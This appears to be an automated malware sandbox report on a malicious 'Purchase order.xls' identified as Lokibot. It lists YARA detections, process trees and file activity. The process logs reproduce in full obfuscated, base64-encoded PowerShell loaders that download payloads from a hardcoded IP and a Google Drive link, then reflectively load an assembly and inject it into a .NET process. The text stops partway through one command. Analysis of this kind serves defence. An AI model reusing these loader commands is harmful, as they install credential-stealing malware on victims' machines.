Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: powershell.exe PID: 1668, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3804, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: aspnet_regbrowsers.exe PID: 3900, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLS@29/44@6/5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Code function: 26_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

26_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Code function: 26_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

26_2_0040434D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\23530000

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRB460.tmp

Jump to behavior

Source: Purchase order.xls	OLE indicator, Workbook stream: true
Source: 23530000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............0.q.......q.......&.......................&.......&......................3........................&.............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................q.....}..w......q......................1......(.P.....p.......x.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................q.......q.....}..w.............................1......(.P..............3......................`4E.............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................DN.l....}..w....`4E.....\.......................(.P.....p.......x.......8...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................`4E.....}..w............."L......M.l.... .K.....(.P.....p.......x.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................DN.l....}..w....`4E.....\.......................(.P.....p.......x.......8...............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................`4E.....}..w............."L......M.l.... .K.....(.P.....p.......x.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.."L......M.l.... .K.....(.P.....p.......x............... .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .D.E.V.I.C.E.C.r.E.D.E.N.t.i.a.L.D.E.P.l.o.y.m.e.n.T...E.X.e.p.......x...............@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.p.......x...............@.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................`4E.....}..w............."L......M.l.... .K.....(.P.....p.......x.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................`4E.....}..w............."L......M.l.... .K.....(.P.....p.......x...............l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......`4E.....}..w............."L......M.l.... .K.....(.P.....p.......x.......................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............2.1.4.7.5.0.0.0.3.6.....................`m......hm.......................3......................`m..............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................q.....}..w......q......................1......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................q.......q.....}..w.............................1......(.P..............3......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................~..l....}..w............\.......................(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w............. w........l....@.v.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................~..l....}..w............\.......................(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w............. w........l....@.v.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....H.......N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.. w........l....@.v.....(.P.....................H....... .......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .D.E.V.I.C.E.C.r.E.D.E.N.t.i.a.L.D.E.P.l.o.y.m.e.n.T...E.X.e.................H.......@.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.................H.......@.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w............. w........l....@.v.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...H.......N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w............. w........l....@.v.....(.P.............................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ...............}..w............. w........l....@.v.....(.P.....................H...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............T.r.u.e...q.....}..w.............................1......(.P..............3......H...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................q.....}..w......q......................1......(.P.............d.......H...............................

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Purchase order.xls

ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AEA.tmp" "c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9251.tmp" "c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRo